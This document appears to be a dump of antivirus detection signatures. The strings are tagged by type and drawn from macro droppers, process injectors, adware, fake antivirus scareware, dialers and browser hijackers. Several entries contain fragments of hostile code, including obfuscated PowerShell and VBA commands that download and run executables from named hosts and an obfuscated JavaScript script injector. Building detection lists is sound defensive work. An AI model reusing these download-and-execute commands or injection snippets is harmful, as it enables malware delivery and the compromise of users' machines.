- .exe""-outfile$tempfile;start-process$tempfile;debug.printscommandsetowshshell=createobject("wscript.shell")setowshshellexec=owshshell.exec(scommand)soutput (MACROHSTR_EXT)
- Roblox_Executor_WolfCheats.Properties (PEHSTR_EXT)
- Orange_Tech.Properties (PEHSTR_EXT)
- scripts_Load (PEHSTR_EXT)
- }: /delete 2>&1 (PEHSTR_EXT)
- [System.IO.File]::ReadAllBytes($ (PEHSTR_EXT)
- $(${CALLBACK_URL})upload?script (PEHSTR_EXT)
- [Reflection.Assembly]::Load([byte[]]$ (PEHSTR_EXT)
- .Name) -ForceASLR -ExeArgs $ (PEHSTR_EXT)
- .DownloadString( (PEHSTR_EXT)
- DataEstateAssessment.script.ps1 (PEHSTR_EXT)
- maptor_free_option_description (PEHSTR_EXT)
- //topvaluationfirms.com/jahah.png (MACROHSTR_EXT)
- c:\ProgramData\spread.exe (PEHSTR_EXT)
- cmd /c cscript c:\ProgramData\vbs.vbs (PEHSTR_EXT)
- subauto_open()dimshellasobjectdimcommandasstring'specifythepowershellcommandyouwanttoruncommand="get-process"'createanewshellobjectsetshell=createobject("wscript.shell")' (MACROHSTR_EXT)
- openpowershellandrunthecommandshell.run"powershell&powershell(nslookup-q=txt (MACROHSTR_EXT)
- .abena-dk.cam)[-1]-nonewwindow",0,false'releasetheshellobjectsetshell=nothingendsub (MACROHSTR_EXT)
- ^p*o^*w*e*r*s^^*h*e*l^*l**^-*w*i*n*^d*o*w^*s*t*y*^l*e**h*i*^d*d*^e*n^**-*e*x*^e*c*u*t*^i*o*n*pol^icy**b*yp^^ass*;*$tempfile**=**[*i*o*.*p*a*t*h*]*::gettem*pfile*name()|ren^ame-it^em-newname{$_-replace'tmp$','exe' (MACROHSTR_EXT)
- = ".": (MACROHSTR_EXT)
- .open"get",("h://www.vmd.m/mw/hd."),false.send=.responsebodyif.status=200thenset=createobject("adodb.stream").open.type=.write.savetofile,+.closeendif.open()end (MACROHSTR_EXT)
- set=createobject("microsoft.xmlhttp")set=createobject("shell.application")= (MACROHSTR_EXT)
- .specialfolders("recent")dimdimdimdimdimdimasintegerdimdim=1range(" (MACROHSTR_EXT)
- ").value (MACROHSTR_EXT)
- =createobject("wscript.shell") (MACROHSTR_EXT)
- SYSTEM\CurrentControlSet\services\WinResSvc\Parameters (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost (PEHSTR_EXT)
- /javascript/view.php (PEHSTR_EXT)
- [TASK] Releasing mutex, sleeping... (PEHSTR_EXT)
- [TASK] Comms lib inactive, sleeping (PEHSTR_EXT)
- [MTX] Successfully created mutexes (PEHSTR_EXT)
- [ERROR-TASK] CreateProcessA failed. GetLastError: (PEHSTR_EXT)
- [ERROR-INJ] targetProcesses is empty after attempting to build vector. (PEHSTR_EXT)
- [ERROR-INJ] targetProcList is empty after GetConfigValue call. (PEHSTR_EXT)
- [ERROR-INJ] WriteProcessMemory failed. GetLastError: (PEHSTR_EXT)
- [ERROR-INJ] Unable to locate DLL to inject at path: (PEHSTR_EXT)
- [ERROR-INJ] Snapshot empty or issue with Process32First. GetLastError: (PEHSTR_EXT)
- [ERROR-INJ] CreateToolhelp32Snapshot failed. GetLastError: (PEHSTR_EXT)
- [ERROR-INJ] AdjustTokenPrivileges failed. ReturnValue: (PEHSTR_EXT)
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54 (PEHSTR)
- workdict.xml (PEHSTR)
- we^bre*quest-u^ri""http://lostheaven.com.cn/wp-includes/id3/doc_1086_036pdf.exe""-out*file$tempfile; (MACROHSTR_EXT)
- replace(iskte,"^","")seticfyi=createobject("wscript.shell")seticfyiexec=icfyi.exec(iskte) (MACROHSTR_EXT)
- DLL_LoaderU (PEHSTR_EXT)
- script.au3 (PEHSTR_EXT)
- Autoit3.exe (PEHSTR_EXT)
- .open"get",jnbihbnilbjhvgfvghb("q~~zg<<fa;>bc;?b@;cegbcdf<tprp}vpx}u~qx}<t}urtptqrtq}rqtrutqp~tqpp|t}pqoptop<};nn") (MACROHSTR_EXT)
- source_sa\Bin\Release\Setup.pdb (PEHSTR)
- appbundler.com (PEHSTR)
- http://hotbar.com (PEHSTR)
- javascript:window.open (PEHSTR)
- hbhostol.dll (PEHSTR)
- HbHostOE.DLL (PEHSTR)
- Software\Zango\Zango\ (PEHSTR)
- Software\Seekmo\Seekmo\ (PEHSTR)
- ZangoSAHook.dll (PEHSTR)
- Software\Zango (PEHSTR)
- eHbToolbar.DLL (PEHSTR)
- DllCanUnloadNow (PEHSTR)
- DllGetClassObject (PEHSTR)
- DllRegisterServer (PEHSTR)
- DllTVRemoteExec (PEHSTR)
- DllUnregisterServer (PEHSTR)
- http://open/?url= (PEHSTR)
- its.not.ok (PEHSTR)
- \hotbar_release\ (PEHSTR)
- installs.hotbar.com (PEHSTR)
- \msiein.dll (FILEPATH)
- \stoolbar.dll (FILEPATH)
- \search toolbar\stoolbar.dll (FILEPATH)
- \common files\msiets\msiets.dll (FILEPATH)
- \common files\msiets\msielink.dll (FILEPATH)
- \downloaded program files\qdow.dll (FILEPATH)
- \search toolbar (FOLDERNAME)
- \common files\msiets (FOLDERNAME)
- software\btiein (REGKEY)
- software\msiets (REGKEY)
- software\msietslink (REGKEY)
- Software\Classes\btlink.resprotocol (REGKEY)
- Software\Classes\btlink.relatedlinksprotocol (REGKEY)
- Software\Classes\btieinscriptconfigproj.btieinscriptconfig (REGKEY)
- software\microsoft\windows\currentversion\uninstall\btlink_dll (REGKEY)
- software\microsoft\windows\currentversion\uninstall\hauto_uninstall (REGKEY)
- software\microsoft\code store database\distribution units\{26e8361f-bce7-4f75-a347-98c88b418322} (REGKEY)
- wscript.exe boot.vbs (PEHSTR_EXT)
- wscript (PEHSTR_EXT)
- wskrnlad.dll (PEHSTR_EXT)
- wskrnlb.dll (PEHSTR_EXT)
- PSAPI.dll (PEHSTR_EXT)
- wskrnlac.dll (PEHSTR_EXT)
- Policies\Comdlg32 (PEHSTR_EXT)
- Policies\Network (PEHSTR_EXT)
- %s\shell\printto\%s (PEHSTR_EXT)
- YOUR-EMAIL@-HERE-.COM (PEHSTR_EXT)
- \\Admin-PC\ (PEHSTR_EXT)
- Reports\ (PEHSTR_EXT)
- <ActMonPro5@actmonpro.com> (PEHSTR_EXT)
- Exiting StopProcess("explorer.exe") with failure (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Policies\Network (PEHSTR_EXT)
- \\Admin-PC\ActMonReports\ (PEHSTR_EXT)
- Please report to support2@ActMon.com (PEHSTR_EXT)
- CurrentControlSet\Control\Class\{4D36E96B-E325-11CE-BFC1-08002BE10318} (PEHSTR_EXT)
- http://www.slotch.com/ist/softwares/v4.0/istdownload.exe (PEHSTR_EXT)
- 0-9 /cfg: (PEHSTR_EXT)
- /ist/scripts/ist (PEHSTR_EXT)
- Software\IST (PEHSTR_EXT)
- /soft:istdownload (PEHSTR_EXT)
- slotch.com/ (PEHSTR_EXT)
- couldnotfind.com/search_page.html? (PEHSTR_EXT)
- install.xxxtoolbar.com (PEHSTR_EXT)
- Uninstall\ISTsvc (PEHSTR_EXT)
- istsvc_del.bat (PEHSTR_EXT)
- /soft:istsvc /version:%i (PEHSTR_EXT)
- c:\vmcheck.dll (PEHSTR_EXT)
- /istdownload_url_log.php (PEHSTR_EXT)
- /ist_debug_new (PEHSTR_EXT)
- AVREP.dll (PEHSTR_EXT)
- \istbar.dll (FILEPATH)
- \mscache.dll (FILEPATH)
- \mscache.exe (FILEPATH)
- \aupdate.exe (FILEPATH)
- \penoghih.exe (FILEPATH)
- /aid:%i /cfg:%s /soft:%i /vkey:%s /tkey:%s /tlock:%s /exe:%s (PEHSTR_EXT)
- %s\n_%s.exe (PEHSTR_EXT)
- \yoursitebar (FOLDERNAME)
- SOFTWARE\YourSiteBar (REGKEY)
- Software\YourSiteBar (REGKEY)
- SOFTWARE\Classes\Ysb.YsbObj (REGKEY)
- Software\Classes\Ysb.YsbObj (REGKEY)
- SOFTWARE\Classes\Ysb.YsbObj.1 (REGKEY)
- Software\Classes\Ysb.YsbObj.1 (REGKEY)
- SOFTWARE\Classes\YSBactivex.Installer (REGKEY)
- Software\Classes\YSBactivex.Installer (REGKEY)
- SOFTWARE\Classes\YSBactivex.Installer.1 (REGKEY)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YourSiteBar (REGKEY)
- Software\microsoft\windows\currentversion\uninstall\YourSiteBar (REGKEY)
- SOFTWARE\Microsoft\Code Store Database\Distribution Units\{771A1334-6B08-4A6B-AEDC-CF994BA2CEBE} (REGKEY)
- SOFTWARE\Microsoft\Code Store Database\Distribution Units\{42F2C9BA-614F-47C0-B3E3-ECFD34EED658} (REGKEY)
- \yoursitebar\ysb.dll (ASEP_FILEPATH)
- download.PestCapture.com (PEHSTR)
- /pcdownload.php?& (PEHSTR)
- PestCapture.exe (PEHSTR)
- 69.50.175.1 (PEHSTR)
- SOFTWARE\PestCaptureSetup (PEHSTR)
- PestCapture 3.2 Setup (PEHSTR)
- Host: download.bravesentry.com (PEHSTR)
- /download.php?& (PEHSTR)
- BraveSentry.exe (PEHSTR)
- 69.50.175.181 (PEHSTR)
- SOFTWARE\BraveSentrySetup (PEHSTR)
- BraveSentry 2.0 Setup (PEHSTR)
- Host: download.spy-shredder.com (PEHSTR)
- /ssdownload.php?& (PEHSTR)
- SpyShredder.exe (PEHSTR)
- 69.50.175.180 (PEHSTR)
- SOFTWARE\SpyShredderSetup (PEHSTR)
- SpyShredder 2.0 Setup (PEHSTR)
- Host: download.MalwareAlarm.com (PEHSTR)
- /madownload.php?& (PEHSTR)
- cashon.co.kr (PEHSTR)
- auction.co.kr (PEHSTR)
- dnshop.co.kr (PEHSTR)
- cjmall.co.kr (PEHSTR)
- gmarket.co.kr (PEHSTR)
- -SOFTWARE\Microsoft\Windows\CurrentVersion\Run (PEHSTR)
- previous_update_exe (PEHSTR_EXT)
- CashOn\bin (PEHSTR_EXT)
- *.exe (PEHSTR_EXT)
- ncserv*.exe (PEHSTR_EXT)
- C:\Program Files\CashOn\data\popup.dat (PEHSTR_EXT)
- SOFTWARE\CashOn\ (PEHSTR_EXT)
- http://www.cashon.co.kr/search/search.php (PEHSTR_EXT)
- D:\Project\Press\premiere.or.kr\Source\PSCInfo.dll_20 (PEHSTR_EXT)
- http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type= (PEHSTR_EXT)
- http://www.cashon.co.kr/app/app.php?url= (PEHSTR_EXT)
- script.shop-guide.co.kr (PEHSTR_EXT)
- Updateexe_Date (PEHSTR_EXT)
- http://www.cashon.co.kr/app/install.php? (PEHSTR_EXT)
- C:\Program Files\Cashon\bin\ (PEHSTR_EXT)
- SOFTWARE\WebGuide (PEHSTR)
- SOFTWARE\AppDataLow (PEHSTR)
- .web-guide.co.kr (PEHSTR)
- RewardNetwork. (PEHSTR)
- Software\RewardNet (PEHSTR)
- .rewardnetwork.net (PEHSTR)
- SOFTWARE\ShopGuide\ (PEHSTR)
- .shop-guide.co.kr (PEHSTR)
- 3http://script.shop-guide.co.kr/script/shopguide.php (PEHSTR)
- 6http://www.shop-guide.co.kr/cs/help.php?type=sg_notice (PEHSTR)
- &http://update.shop-guide.co.kr/update/ (PEHSTR)
- fSOFTWARE\ShopGuide (PEHSTR)
- www.shop-guide.co.kr (PEHSTR)
- =RewardNetwork.ShopGuide.1 = s 'RewardNetwork ShopGuide Class' (PEHSTR)
- \WebGuide (FOLDERNAME)
- \RewardNet (FOLDERNAME)
- \XLToolbar (FOLDERNAME)
- \shopguide (FOLDERNAME)
- Software\WebGuide (REGKEY)
- Software\ShopGuide (REGKEY)
- \\.\Smartvsd (PEHSTR)
- \\.\PhysicalDrive%d (PEHSTR)
- Jdownload/promote/promote.dll (PEHSTR)
- \promote.dll (PEHSTR)
- http://statistics.tom.com/scripts/Skype/sobar.exe (PEHSTR)
- http://61.135.159.183/installer/sobar.exe (PEHSTR)
- http://skype.tom.com/download/install/sobar.exe (PEHSTR)
- \sobar.exe (PEHSTR)
- .DLL (PEHSTR_EXT)
- http://count.e-jok.cn/count.txt (PEHSTR_EXT)
- SkypeClient.exe (PEHSTR_EXT)
- http://www.e-jok.cn/count/updatedata.aspx?id= (PEHSTR_EXT)
- http://www.e-jok.cn/cnfg/canview.txt (PEHSTR_EXT)
- http://www.e-jok.cn/cnfg/_poplkh (PEHSTR_EXT)
- <center><iframe width=%d height=%d frameborder=0 SCROLLING=no src="%s"></iframe></center> (PEHSTR_EXT)
- http://statistics.tom.com/scripts/Skype/sobar.exe (PEHSTR_EXT)
- .tom.com/download/promote/promote.dll (PEHSTR_EXT)
- .e-jok.cn/count (PEHSTR_EXT)
- /updatedata.aspx?id= (PEHSTR_EXT)
- /cnt.jpg (PEHSTR_EXT)
- %s\%c%c%c%c%c.%s (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion (PEHSTR_EXT)
- http://85 (PEHSTR_EXT)
- InitializeSecurityDescriptor (PEHSTR_EXT)
- HttpOpenRequestA (PEHSTR_EXT)
- HttpAddRequestHeadersA (PEHSTR_EXT)
- HttpSendRequestA (PEHSTR_EXT)
- Ahttp://www.hotdutchporn.net/cb/scripts/getAddressFromIP.php?wmid= (PEHSTR)
- ~~~~~~~~.htm (PEHSTR)
- http://dialin.bunm.de/ (PEHSTR)
- http://www.i-cash.de/ (PEHSTR)
- http://www.netfe.org/ (PEHSTR)
- http://dialin.comonline.net/ (PEHSTR)
- http://dialin.dnibv.com/ (PEHSTR)
- Port has been opened successfully. (PEHSTR_EXT)
- \ExeDialer.exe (PEHSTR_EXT)
- exedialer (PEHSTR_EXT)
- instant access.exe (PEHSTR_EXT)
- \Instant Access\Center\ (PEHSTR_EXT)
- CDialerEXEDlg::CreateShortCut() (PEHSTR_EXT)
- <description>instant-acess</description> (PEHSTR_EXT)
- <requestedExecutionLevel level="requireAdministrator" (PEHSTR_EXT)
- RegisterEXE (PEHSTR_EXT)
- Jtarget='_self' id='fordreamclick'><br><script defer>fordreamclick.click(); (PEHSTR)
- ini.officesupdate.net (PEHSTR)
- ini.msnmessengerupdate.net (PEHSTR)
- ini.office2005updates.net (PEHSTR)
- http://www.look2me.com (PEHSTR)
- +</form></div><script language='javascript'> (PEHSTR)
- Software\Look2Me (PEHSTR)
- pguard.ini (PEHSTR_EXT)
- genavir.exe (PEHSTR_EXT)
- livees.exe (PEHSTR_EXT)
- iavir.exe (PEHSTR_EXT)
- /uninstall /silent (PEHSTR_EXT)
- xoomer.alice.it (PEHSTR_EXT)
- Internet Antivirus Pro" /password=avir (PEHSTR_EXT)
- regedit.exe (PEHSTR_EXT)
- totalcmd.exe (PEHSTR_EXT)
- /verysilent /norestart /NOCANCEL /DIR=" (PEHSTR_EXT)
- \Internet Antivirus Pro" /password=avir (PEHSTR_EXT)
- /download/Ipack (PEHSTR_EXT)
- /download/file.jpg (PEHSTR_EXT)
- \General Antivirus" /password=gen (PEHSTR_EXT)
- Application %s is already installed. To download and install it again? (PEHSTR_EXT)
- xpsp2res.dll (PEHSTR_EXT)
- Trojan-IM.Win32.Faker.a (PEHSTR_EXT)
- IA*.lng (PEHSTR_EXT)
- IAUpdater.exe /R (PEHSTR_EXT)
- DBInfo.ver (PEHSTR_EXT)
- 69.50.168.50 (PEHSTR)
- Host: download.%s.com (PEHSTR)
- /download.php?&advid=00000000&u=%u&p=%u HTTP/1.0 (PEHSTR)
- C:\Program Files\%s\%s.lic (PEHSTR)
- SOFTWARE\DrAntispySetup (PEHSTR)
- /drdownload.php?& (PEHSTR)
- 69.50.165.18 (PEHSTR)
- >GET http://download.%s.com%s&u=%u&advid=00000000&p=%u HTTP/1.0 (PEHSTR)
- DrAntispy 3.5 Setup (PEHSTR)
- #Internet connection is unavailable. (PEHSTR)
- Plasma\Antivirus.exe (PEHSTR_EXT)
- Software\Antivirus (PEHSTR_EXT)
- \Antivirus Plasma\Antivirus.exe (PEHSTR_EXT)
- \Antivirus Plasma\Antivirus Plasma.lnk (PEHSTR_EXT)
- Loading... (PEHSTR_EXT)
- ConfigPanel.cpl (PEHSTR_EXT)
- SOFTWARE\ (PEHSTR_EXT)
- kill /F /IM (PEHSTR_EXT)
- Automatic Updates feture is enabled. (PEHSTR_EXT)
- .innerHTML='Spyware protection (PEHSTR_EXT)
- YGHelper.DLL (PEHSTR)
- YGHelper.SearchHelper (PEHSTR)
- Tgooglina.DLL (PEHSTR)
- rapidantivirus.com (PEHSTR)
- [Spyware.CyberAlert2; (PEHSTR)
- Description: (PEHSTR)
- $Windows\CurrentVersion\Run\"Default" (PEHSTR)
- support@eurekalog.com (PEHSTR)
- HowToBuy.txt (PEHSTR)
- (C:\Documents and Settings\JohnDoe\Deskto (PEHSTR)
- \Rapid Antivirus (PEHSTR)
- \Win Antivir 2008 (PEHSTR)
- HowToBuy.txt (PEHSTR_EXT)
- lsascs.exe (PEHSTR_EXT)
- /installok?ref_id= (PEHSTR_EXT)
- /install.exe (PEHSTR_EXT)
- /?a=conf&code=%d (PEHSTR)
- #/block# (PEHSTR)
- #/link# (PEHSTR)
- L.com/cgi-bin/nph-pr/pandora/softcore/buy_soft.php?productid=PAVR&advert=site (PEHSTR)
- :.com/cgi-bin/nph-pr/pandora/softcore/activate.php?orderid= (PEHSTR)
- .exe exploit (PEHSTR)
- /buy/?code= (PEHSTR)
- mailto:support@av-support.org (PEHSTR)
- /script.php?code= (PEHSTR)
- aContinue working in unprotected mode is very dangerous. Viruses can damage your confidential data (PEHSTR)
- BhoNew.dll (PEHSTR)
- regsvr32.exe /s (PEHSTR)
- ntdll64.dll (PEHSTR)
- \init32.exe (PEHSTR)
- lsp-test-nax.ind.in (PEHSTR)
- win32hlp.cnf (PEHSTR)
- Your system is infected. Please activate your antivirus software. (PEHSTR_EXT)
- monster.com (PEHSTR_EXT)
- bbc.co.uk (PEHSTR_EXT)
- bebo.com (PEHSTR_EXT)
- %s/activate.php?email=%s&code=%s (PEHSTR)
- ./AvScan.conf (PEHSTR)
- #virustriggerbinwarning.warningbho.1 (PEHSTR)
- Software\AvScan (PEHSTR)
- \runonce\virustriggerbin (PEHSTR)
- Software\AvScan (PEHSTR_EXT)
- proxylsp.dll (PEHSTR_EXT)
- %s/block.php?r=%s (PEHSTR_EXT)
- %s/purchase?r=%s (PEHSTR_EXT)
- /activate.php?email= (PEHSTR_EXT)
- /scan (PEHSTR_EXT)
- avsuite.exe (PEHSTR_EXT)
- htmlayout.dll (PEHSTR_EXT)
- avsoft.exe (PEHSTR_EXT)
- Software\avs (PEHSTR_EXT)
- downloads/common/script.s (PEHSTR_EXT)
- `.rdata (PEHSTR_EXT)
- @.data (PEHSTR_EXT)
- Software\ssuite (PEHSTR_EXT)
- BaseNamedObjects\6953EA60-8D5F-4529-8710-42F8ED3E8CDA (PEHSTR_EXT)
- avp.exe (PEHSTR_EXT)
- \\.\MagicRc10 (PEHSTR_EXT)
- urlmon.dll (PEHSTR)
- release\SEC.pdb (PEHSTR)
- !C:\Program Files\AntiMalwareGuard (PEHSTR)
- antimalwareguard.com (PEHSTR)
- amg.exe (PEHSTR)
- malwarecrashpro.com (PEHSTR)
- \SEC\bstate.dat (PEHSTR)
- AlertDescription (PEHSTR)
- ACurrentVersion\Terminal Server\Install\Software\Microsoft\Windows (PEHSTR)
- Cleaner2009\ (PEHSTR)
- /adv/order/?abbr= (PEHSTR)
- PAS.exe (PEHSTR)
- personalantispy.com (PEHSTR)
- Handlers\ExplorerUPAS (PEHSTR)
- upashellext.WAS (PEHSTR)
- insts.spywareremover2009plus.com/?action (PEHSTR_EXT)
- SpywareRemover2009 is being downloaded to PC. (PEHSTR_EXT)
- shellex\ContextMenuHandlers\ExplorerWAS (PEHSTR_EXT)
- page.html (PEHSTR_EXT)
- I<head><title>search</title></head><script>location.replace("%s")</script> (PEHSTR)
- GET /search?q=%S HTTP/1.1 (PEHSTR)
- \\?\globalroot\systemroot\system32\drivers\ (PEHSTR_EXT)
- Software\h8srt (PEHSTR_EXT)
- >ClickMe</a><script type="text/javascript">redirect.click();</script> (PEHSTR_EXT)
- sorder.dll (PEHSTR_EXT)
- partners.adtelect.com/post/?CellID= (PEHSTR_EXT)
- websearch.php?src=tops&search= (PEHSTR_EXT)
- <key>HomePage</key> (PEHSTR_EXT)
- congratulations.php?aff= (PEHSTR_EXT)
- " /adom=" (PEHSTR_EXT)
- " /parent= (PEHSTR_EXT)
- invalid vector<t> subscript (PEHSTR_EXT)
- dllcanunloadnow (PEHSTR_EXT)
- dllgetclassobject (PEHSTR_EXT)
- dllregisterserver (PEHSTR_EXT)
- dllunregisterserver (PEHSTR_EXT)
- /setup.asp?res=ok&id= (PEHSTR_EXT)
- \nsss (PEHSTR_EXT)
- /remove.asp?id= (PEHSTR_EXT)
- \unsss (PEHSTR_EXT)
- DllGetClassObject (PEHSTR_EXT)
- invalid vector<T> subscript (PEHSTR_EXT)
- addtosoftlinksform.jsp?q=%URL% (PEHSTR_EXT)
- SearchScopes\infoaxe_google (PEHSTR_EXT)
- infoaxe.com/enhancedsearchform.jsp (PEHSTR_EXT)
- \webhistorysearch (FOLDERNAME)
- Software\Infoaxe (REGKEY)
- Software\LowRegistry\Infoaxe (REGKEY)
- Software\Infoaxe\InfoaxeToolbar (REGKEY)
- Software\LowRegistry\Infoaxe\InfoaxeToolbar (REGKEY)
- Software\Microsoft\Internet Explorer\SearchScopes\infoaxe_google (REGKEY)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Web History Search Toolbar_is1 (REGKEY)
- Software\Microsoft\Internet Explorer\URLSearchHooks\\{717EDDE0-444F-4ff0-B9C9-F60EC423E690} (REGKEY)
- Software\Microsoft\Internet Explorer\Main\\Start Page- (REGKEY)
- http://www.infoaxe.com/enhancedsearchform.jsp (REGKEY)
- %USERPROFILE%\cz.dat (PEHSTR_EXT)
- /xui/manda.php (PEHSTR_EXT)
- /js.php?u=%d&b=%d&a=%d"></script> (PEHSTR_EXT)
- lorer\Registration (PEHSTR_EXT)
- %USERPROFILE%\pizda_cz.dat (PEHSTR_EXT)
- UJS_Hijack.DLL (PEHSTR)
- LIBID_JS_HijackLib (PEHSTR)
- JS_HijackModule (PEHSTR)
- javascript (PEHSTR)
- ldr_facedll (PEHSTR_EXT)
- mainfb.script (PEHSTR_EXT)
- <script> for (i=0; i<document.links.length; i++) {var str=document.links(i).href;if (str.indexOf("/aclk")!=-1){alert(document.links(i).href);break;}}</script> (PEHSTR_EXT)
- .com/click/?s= (PEHSTR_EXT)
- .?AV?$CComAggObject@VCInjectObject@@@ATL@@ (PEHSTR_EXT)
- .?AVCIEInjectModule@@ (PEHSTR_EXT)
- IEInject.dll (PEHSTR_EXT)
- LyricsContainertmp.exe (PEHSTR_EXT)
- lyrcsBtmp.exe (PEHSTR_EXT)
- LyriXupdate.exe.mtx (PEHSTR_EXT)
- /updater/1060/ (PEHSTR_EXT)
- /report/%s/?aff=1060&subaff= (PEHSTR_EXT)
- ;window._rvz (PEHSTR_EXT)
- sprlrcs.dll (PEHSTR_EXT)
- hppylrc.dll (PEHSTR_EXT)
- lyrmix.dll (PEHSTR_EXT)
- lrcspal.dll (PEHSTR_EXT)
- singalng.dll (PEHSTR_EXT)
- FindLyrics.dll (PEHSTR_EXT)
- lrcson.dll (PEHSTR_EXT)
- lfinder.dll (PEHSTR_EXT)
- autolrcs.dll (PEHSTR_EXT)
- InfoURL="http://safesaver.net/" (PEHSTR_EXT)
- bgscript="DMxGsy8KhH82Ae43pSwFvyVKAfn3hNlKg6mPB7 (PEHSTR_EXT)
- = "http://safesaver.net/" (PEHSTR_EXT)
- Y2Desktop.PlugInOS (PEHSTR_EXT)
- WebCake LLC. All rights reserved. (PEHSTR_EXT)
- WebCake.Desktop (PEHSTR_EXT)
- get_plugin_getwebcake_com (PEHSTR_EXT)
- ProgID = s 'WebCakeIEClient.Layers.1' (PEHSTR_EXT)
- urls_to_restore_on_startup": [ "http://search.getwebcake.com/" ]} (PEHSTR_EXT)
- WebCake Loud Installer (Main)\Binaries\WebCakeChromeWatch.pdb (PEHSTR_EXT)
- \betcat (FOLDERNAME)
- \movdap (FOLDERNAME)
- \tepfel (FOLDERNAME)
- \WebCake (FOLDERNAME)
- \Web Cake (FOLDERNAME)
- (x86)\betcat (FOLDERNAME)
- (x86)\movdap (FOLDERNAME)
- (x86)\tepfel (FOLDERNAME)
- (x86)\WebCake (FOLDERNAME)
- (x86)\Web Cake (FOLDERNAME)
- \Mozilla\Firefox\Profiles\extensions\extensions\plugin@getwebcake.com (FOLDERNAME)
- \Mozilla\Firefox\Profiles\????????.default\extensions\plugin@webcake.com (FOLDERNAME)
- \Mozilla\Firefox\Profiles\????????.default\extensions\plugin@getwebcake.com (FOLDERNAME)
- \MyApplicationData\~backup.exe (PEHSTR_EXT)
- Host: metrika.yandex.ru (PEHSTR_EXT)
- <script src="http://google.ru/js"></script> (PEHSTR_EXT)
- ~tempbackup.exe (PEHSTR_EXT)
- ~dwnld.exe (PEHSTR_EXT)
- \ie\Release\BetterS (PEHSTR_EXT)
- rf.pdb (PEHSTR_EXT)
- CComObject@VCBetterS (PEHSTR_EXT)
- rf.dll (PEHSTR_EXT)
- CComObject@VCWebexpEnhanced (PEHSTR_EXT)
- \bettersurf.exe (FILEPATH)
- \better-surf.exe (FILEPATH)
- \bettersurf (FOLDERNAME)
- \MediaBuzzV1 (FOLDERNAME)
- \MediaViewV1 (FOLDERNAME)
- \better-surf (FOLDERNAME)
- \MediaWatchV1 (FOLDERNAME)
- \MediaPlayerV1 (FOLDERNAME)
- \MediaViewerV1 (FOLDERNAME)
- \VideoPlayerV3 (FOLDERNAME)
- \RichMediaViewV1 (FOLDERNAME)
- (x86)\bettersurf (FOLDERNAME)
- \WebexpEnhancedV1 (FOLDERNAME)
- (x86)\better-surf (FOLDERNAME)
- \TrustMediaViewerV1 (FOLDERNAME)
- \PluginInjectIE\Release\BaseFlash.pdb (PEHSTR_EXT)
- sts.baseflash.com/software_stats/ (PEHSTR_EXT)
- &action_description=IE (PEHSTR_EXT)
- st.rewinup.com/software_stats/ (PEHSTR_EXT)
- !document.getElementById('mybho_js') && (PEHSTR_EXT)
- .com/base/ (PEHSTR_EXT)
- baserewin.js (PEHSTR_EXT)
- ads.okitspace.com/uploads/cover.js (PEHSTR_EXT)
- \BaseFlash (FOLDERNAME)
- \okitspace (FOLDERNAME)
- \ProtectExtension (FOLDERNAME)
- SOFTWARE\PluginProtect (REGKEY)
- SOFTWARE\ProtectExtension (REGKEY)
- <script src="http://google.ru/js (PEHSTR_EXT)
- /file/upload.php (PEHSTR_EXT)
- default.cfg (PEHSTR_EXT)
- metrika.yandex.ru (PEHSTR_EXT)
- </script> (PEHSTR_EXT)
- [UDLL] (PEHSTR_EXT)
- [DLL] (PEHSTR_EXT)
- ProgID = s 'DigiAd.DigiAd.1' (PEHSTR_EXT)
- script.id = "adnetworkme_js" (PEHSTR_EXT)
- addon@Vonteera.com (PEHSTR_EXT)
- Software\Vonteera Safe ads (PEHSTR_EXT)
- SOFTWARE\NoVooITSet (PEHSTR_EXT)
- \NoVooITAddon (PEHSTR_EXT)
- www.acdcads.com/aff/thanks/thanks3.php?code= (PEHSTR_EXT)
- ProgID = s 'adTech.adTech.1' (PEHSTR_EXT)
- var _0xec03=["","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x6C\x61\x72\x61\x62\x65\x79\x65\x73\x2E\x63\x6F\x6D (PEHSTR_EXT)
- gRandScriptUrls[_0xec03[56]+_0xe525x2b[0]][_0xec03[61]] (PEHSTR_EXT)
- var _0xe525x27= new XMLHttpRequest();_0xe525x27[_0xec03[50]](_0xec03[49], (PEHSTR_EXT)
- chrome.tabs.onCreated.addListener(function(tab){ (PEHSTR_EXT)
- chrome.tabs.get(tab_id, (PEHSTR_EXT)
- check_for_js_injection); (PEHSTR_EXT)
- function add_remove_script(url) (PEHSTR_EXT)
- return 'var Adtech_users_js (PEHSTR_EXT)
- gRandScriptUrls["ht" + tmp[0]].push("ht" + tmp[0] + "://" + tmp[1] + "." + tmp[2] + "/" + ((tmp[3] === ":") ? "" : (tmp[3].replace(/\:/, "") + "/")) + tmp[4] + ".js"); (PEHSTR_EXT)
- console.log('Injected to', tab.url); (PEHSTR_EXT)
- \Tasks\nod (FILEPATH)
- \Tasks\nod01 (FILEPATH)
- L//e:vbscript //B //NOLOGO "AV Name" "{8E5CADC3-2C41-4886-B211-9C1D59EDD30F}" (PEHSTR)
- DefendrvPro.exe (PEHSTR)
- MDefender.exe (PEHSTR)
- uggc:// (PEHSTR_EXT)
- /vzt/ccp.rkr (PEHSTR_EXT)
- /get_two.php? (PEHSTR_EXT)
- CheckExeSignatures (PEHSTR_EXT)
- parttwo.dll (PEHSTR_EXT)
- ;t\L[g? (SNID)
- \Defender PRO 2015.lnk (FILEPATH)
- \Malware Defender 2015.lnk (FILEPATH)
- \Defender PRO 2015 (FOLDERNAME)
- \Malware Defender 2015 (FOLDERNAME)
- (x86)\Defender PRO 2015 (FOLDERNAME)
- (x86)\Malware Defender 2015 (FOLDERNAME)
- Software\DefendrvPro (REGKEY)
- Software\MaDefenvder (REGKEY)
- InstallerUtils.dll (PEHSTR_EXT)
- Software\1 (PEHSTR_EXT)
- zoomutil32.dll (PEHSTR_EXT)
- apputil32.dll (PEHSTR_EXT)
- In CallJS.Invoke -> 0x%08X (PEHSTR_EXT)
- content/dgmain.js (PEHSTR_EXT)
